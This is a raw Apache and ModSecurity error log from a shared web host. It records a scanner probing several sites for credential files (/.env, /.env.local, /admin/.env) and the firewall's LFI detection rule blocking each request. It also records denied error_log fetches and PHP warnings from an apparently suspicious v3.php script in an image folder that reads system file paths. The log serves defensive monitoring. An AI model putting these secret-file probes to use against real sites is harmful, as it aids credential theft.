[Mon May 11 18:26:17.103897 2026] [security2:error] [pid 1416109:tid 1416149] [client 34.154.227.165:53558] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.docker"] [unique_id "agIDKVV4kyjgo4bQBUh-ogAAANM"]
[Mon May 11 18:26:17.104832 2026] [security2:error] [pid 1412074:tid 1412085] [client 34.154.227.165:53554] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.local"] [unique_id "agIDKTJnyuKVXoStDhbgIwAAAEk"]
[Mon May 11 18:26:17.104984 2026] [security2:error] [pid 1412074:tid 1412085] [client 34.154.227.165:53554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.local"] [unique_id "agIDKTJnyuKVXoStDhbgIwAAAEk"]
[Mon May 11 18:26:17.106012 2026] [security2:error] [pid 1411099:tid 1411111] [client 34.154.227.165:53552] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.development.local"] [unique_id "agIDKQ-Qm4vhlWBPlMjkSgAAAAs"]
[Mon May 11 18:26:17.106190 2026] [security2:error] [pid 1411099:tid 1411111] [client 34.154.227.165:53552] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.development.local"] [unique_id "agIDKQ-Qm4vhlWBPlMjkSgAAAAs"]
[Mon May 11 18:26:17.107148 2026] [core:error] [pid 1416109:tid 1416149] [client 34.154.227.165:53558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:17.107175 2026] [core:error] [pid 1412074:tid 1412085] [client 34.154.227.165:53554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:17.107761 2026] [security2:error] [pid 1412074:tid 1412085] [client 34.154.227.165:53554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKTJnyuKVXoStDhbgIwAAAEk"]
[Mon May 11 18:26:17.107902 2026] [security2:error] [pid 1416109:tid 1416149] [client 34.154.227.165:53558] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKVV4kyjgo4bQBUh-ogAAANM"]
[Mon May 11 18:26:17.108659 2026] [core:error] [pid 1411099:tid 1411111] [client 34.154.227.165:53552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:17.110308 2026] [security2:error] [pid 1411099:tid 1411111] [client 34.154.227.165:53552] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKQ-Qm4vhlWBPlMjkSgAAAAs"]
[Mon May 11 18:26:17.539061 2026] [security2:error] [pid 1424905:tid 1424922] [client 34.154.227.165:53574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/api/.env"] [unique_id "agIDKYW8yzYoWG_eyCXAYwAAAU4"]
[Mon May 11 18:26:17.539300 2026] [security2:error] [pid 1424905:tid 1424922] [client 34.154.227.165:53574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/api/.env"] [unique_id "agIDKYW8yzYoWG_eyCXAYwAAAU4"]
[Mon May 11 18:26:17.539683 2026] [security2:error] [pid 1411055:tid 1411060] [client 34.154.227.165:53590] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env"] [unique_id "agIDKUWKUxpmnkK7zHyqBAAAAQM"]
[Mon May 11 18:26:17.539893 2026] [security2:error] [pid 1411055:tid 1411060] [client 34.154.227.165:53590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env"] [unique_id "agIDKUWKUxpmnkK7zHyqBAAAAQM"]
[Mon May 11 18:26:17.542344 2026] [core:error] [pid 1424905:tid 1424922] [client 34.154.227.165:53574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:17.542633 2026] [security2:error] [pid 1424905:tid 1424922] [client 34.154.227.165:53574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKYW8yzYoWG_eyCXAYwAAAU4"]
[Mon May 11 18:26:17.545893 2026] [core:error] [pid 1411055:tid 1411060] [client 34.154.227.165:53590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:17.550954 2026] [security2:error] [pid 1411055:tid 1411060] [client 34.154.227.165:53590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKUWKUxpmnkK7zHyqBAAAAQM"]
[Mon May 11 18:26:17.896204 2026] [security2:error] [pid 1411201:tid 1411251] [client 34.154.227.165:53596] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/admin/.env"] [unique_id "agIDKfy_GXSWIKeli0sd_gAAAIU"]
[Mon May 11 18:26:17.896421 2026] [security2:error] [pid 1411201:tid 1411251] [client 34.154.227.165:53596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/admin/.env"] [unique_id "agIDKfy_GXSWIKeli0sd_gAAAIU"]
[Mon May 11 18:26:17.898148 2026] [core:error] [pid 1411201:tid 1411251] [client 34.154.227.165:53596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:17.904151 2026] [security2:error] [pid 1411201:tid 1411251] [client 34.154.227.165:53596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKfy_GXSWIKeli0sd_gAAAIU"]
[Mon May 11 18:26:18.024817 2026] [security2:error] [pid 1424905:tid 1424921] [client 34.154.227.165:53604] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.dev.local"] [unique_id "agIDKoW8yzYoWG_eyCXAZAAAAU0"]
[Mon May 11 18:26:18.025048 2026] [security2:error] [pid 1424905:tid 1424921] [client 34.154.227.165:53604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.dev.local"] [unique_id "agIDKoW8yzYoWG_eyCXAZAAAAU0"]
[Mon May 11 18:26:18.025563 2026] [core:error] [pid 1424905:tid 1424921] [client 34.154.227.165:53604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:18.029207 2026] [security2:error] [pid 1424905:tid 1424921] [client 34.154.227.165:53604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKoW8yzYoWG_eyCXAZAAAAU0"]
[Mon May 11 18:26:30.044260 2026] [security2:error] [pid 1411099:tid 1411292] [client 43.134.92.251:55196] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agIDNg-Qm4vhlWBPlMjkXQAAAAg"]
[Mon May 11 18:26:36.931635 2026] [security2:error] [pid 1412074:tid 1412085] [client 43.134.92.251:47834] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agIDPDJnyuKVXoStDhbgOwAAAEk"], referer: http://www.jeanboyault.fr
[Mon May 11 18:26:53.228983 2026] [ssl:error] [pid 1411201:tid 1411247] (EAI 2)Name or service not known: [client 216.157.40.86:23337] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:26:53.229039 2026] [ssl:error] [pid 1411201:tid 1411247] AH01941: stapling_renew_response: responder error
[Mon May 11 18:26:53.563524 2026] [ssl:error] [pid 1416109:tid 1416133] (EAI 2)Name or service not known: [client 216.157.40.83:31723] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:26:53.563567 2026] [ssl:error] [pid 1416109:tid 1416133] AH01941: stapling_renew_response: responder error
[Mon May 11 18:26:54.218433 2026] [ssl:error] [pid 1412074:tid 1412084] (EAI 2)Name or service not known: [client 216.157.40.83:32803] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:26:54.218482 2026] [ssl:error] [pid 1412074:tid 1412084] AH01941: stapling_renew_response: responder error
[Mon May 11 18:26:54.866404 2026] [ssl:error] [pid 1424905:tid 1424930] (EAI 2)Name or service not known: [client 216.157.40.91:60516] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:26:54.866455 2026] [ssl:error] [pid 1424905:tid 1424930] AH01941: stapling_renew_response: responder error
[Mon May 11 18:26:55.191852 2026] [ssl:error] [pid 1411099:tid 1411111] (EAI 2)Name or service not known: [client 216.157.40.71:24182] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:26:55.191892 2026] [ssl:error] [pid 1411099:tid 1411111] AH01941: stapling_renew_response: responder error
[Mon May 11 18:26:55.510822 2026] [ssl:error] [pid 1424905:tid 1424924] (EAI 2)Name or service not known: [client 216.157.40.84:30412] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:26:55.510857 2026] [ssl:error] [pid 1424905:tid 1424924] AH01941: stapling_renew_response: responder error
[Mon May 11 18:26:56.142467 2026] [ssl:error] [pid 1411201:tid 1411262] (EAI 2)Name or service not known: [client 216.157.40.94:6074] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:26:56.142495 2026] [ssl:error] [pid 1411201:tid 1411262] AH01941: stapling_renew_response: responder error
[Mon May 11 18:26:56.787955 2026] [ssl:error] [pid 1411201:tid 1411252] (EAI 2)Name or service not known: [client 216.157.40.65:49041] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:26:56.787978 2026] [ssl:error] [pid 1411201:tid 1411252] AH01941: stapling_renew_response: responder error
[Mon May 11 18:27:03.806882 2026] [proxy_fcgi:error] [pid 1411201:tid 1411424] [client 103.124.92.234:22048] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:27:05.211841 2026] [ssl:error] [pid 1424905:tid 1424923] (EAI 2)Name or service not known: [client 54.246.246.168:37234] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:27:05.212081 2026] [ssl:error] [pid 1424905:tid 1424923] AH01941: stapling_renew_response: responder error
[Mon May 11 18:27:11.356959 2026] [authz_core:error] [pid 1411055:tid 1411058] [client 194.163.174.253:50382] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 18:27:13.994317 2026] [proxy_fcgi:error] [pid 1411055:tid 1411069] [client 160.250.186.220:43054] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:27:20.278863 2026] [authz_core:error] [pid 1411055:tid 1411071] [client 194.163.174.253:53147] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 18:27:28.618867 2026] [authz_core:error] [pid 1424905:tid 1424925] [client 194.163.174.253:55990] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 18:27:37.029402 2026] [authz_core:error] [pid 1416109:tid 1416129] [client 194.163.174.253:58324] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 18:28:01.937461 2026] [security2:error] [pid 1416109:tid 1416149] [client 124.156.225.181:49958] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-mobilite-regional.com"] [uri "/"] [unique_id "agIDkVV4kyjgo4bQBUh_gAAAANM"]
[Mon May 11 18:28:06.157667 2026] [security2:error] [pid 1412074:tid 1412100] [client 124.156.225.181:45216] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agIDljJnyuKVXoStDhbgnQAAAFg"], referer: http://www.pole-mobilite-regional.com
[Mon May 11 18:28:11.203449 2026] [security2:error] [pid 1411055:tid 1411079] [client 124.156.225.181:52428] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agIDm0WKUxpmnkK7zHyqlAAAARY"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 18:28:13.789421 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:13.826832 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:13.865541 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:13.889818 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:13.914252 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:13.939746 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:13.964255 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:13.988665 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.013261 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.041868 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.066446 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.090924 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.115312 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.141360 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.165699 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.223436 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.249066 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.275437 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.300168 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.324690 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.352515 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.377373 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:28:14.402869 2026] [proxy_fcgi:error] [pid 1411201:tid 1411254] [client 52.236.68.31:10274] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/5e/c54b47d3f78aac808abd6882ff732b827db286 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/5e/c54b47d3f78aac808abd6882ff732b827db286 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
